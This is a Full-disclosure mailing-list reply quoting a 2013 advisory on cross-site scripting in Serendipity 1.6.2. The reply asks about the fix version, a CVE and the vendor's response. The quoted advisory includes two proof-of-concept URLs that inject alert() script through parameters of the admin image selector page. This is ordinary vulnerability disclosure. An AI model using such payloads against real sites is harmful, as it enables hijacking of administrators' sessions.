Re: [Full-disclosure] XSS Vulnerabilities in Serendipity
--Rgf3q3z9SdmXC6oT
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Fri, Jul 12, 2013 at 02:29:52PM +0300, Netsparker Advisories wrote:
> Information
> --------------------
> Name : XSS Vulnerabilities in Serendipity
> Software : Serendipity 1.6.2 and possibly below.
> Vendor Homepage : http://www.s9y.org/
> Vulnerability Type : Cross-Site Scripting
> Severity : Medium
> Researcher : Omar Kurt
> Advisory Reference : NS-13-003
>=20
> Description
> --------------------
> Serendipity is a PHP-powered weblog application which gives the user an
> easy way to maintain an online diary, weblog or even a complete homepage.
> While the default package is designed for the casual blogger, Serendipity
> offers a flexible, expandable and easy-to-use framework with the power for
> professional applications.
>=20
> Details
> --------------------
> Serendipity is affected by XSS vulnerabilities in version 1.6.2.
>=20
> http://example.com/serendipity_admin_image_selector.php?serendipity%5Btex=
tarea%5D=3D%27%2Balert(0x000887)%2B%27&serendipity%5Baction%5D=3D208.100.0.=
117&serendipity%5BadminAction%5D=3D208.100.0.117&serendipity%5BadminModule%=
5D=3D208.100.0.117&serendipity%5Bstep%5D=3Ddefault&serendipity%5Bonly_path%=
5D=3D208.100.0.117
> http://example.com/serendipity_admin_image_selector.php?serendipity%5Bhtm=
ltarget%5D=3D%27%2Balert(0x000A02)%2B%27&serendipity%5Baction%5D=3D208.100.=
0.117&serendipity%5BadminAction%5D=3D208.100.0.117&serendipity%5BadminModul=
e%5D=3D208.100.0.117&serendipity%5Bstep%5D=3Ddefault&serendipity%5Bonly_pat=
h%5D=3D208.100.0.117
>=20
> You can read the full article about Cross-Site Scripting from here :
> http://www.mavitunasecurity.com/crosssite-scripting-xss/
>=20
> Solution
> --------------------
> The vendor fixed this vulnerability in the new version. Please see the
> references.
>=20
> Advisory Timeline
> --------------------
> 26/02/2013 - First contact
> 04/03/2013 - Sent the details
> 10/07/2013 - Advisory released
>=20
> References
> --------------------
> Vendor Url / Patch : -
> MSL Advisory Link :
> https://www.mavitunasecurity.com/xss-vulnerabilities-in-serendipity/
> Netsparker Advisories :
> http://www.mavitunasecurity.com/netsparker-advisories/
So is this fixed in version 1.7? No vendor URL/path listed in your referenc=
es.
Does this vulnerability have CVE identifier? What was vendor response?
---
Henri Salo
--Rgf3q3z9SdmXC6oT
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlHpFhQACgkQXf6hBi6kbk+3DgCgjDZVeqOwjrFgiBqnrObITisH
JecAoKUfoJ/1jGRIb4dLBUAAJYyE0tg2
=Z7mn
-----END PGP SIGNATURE-----
--Rgf3q3z9SdmXC6oT--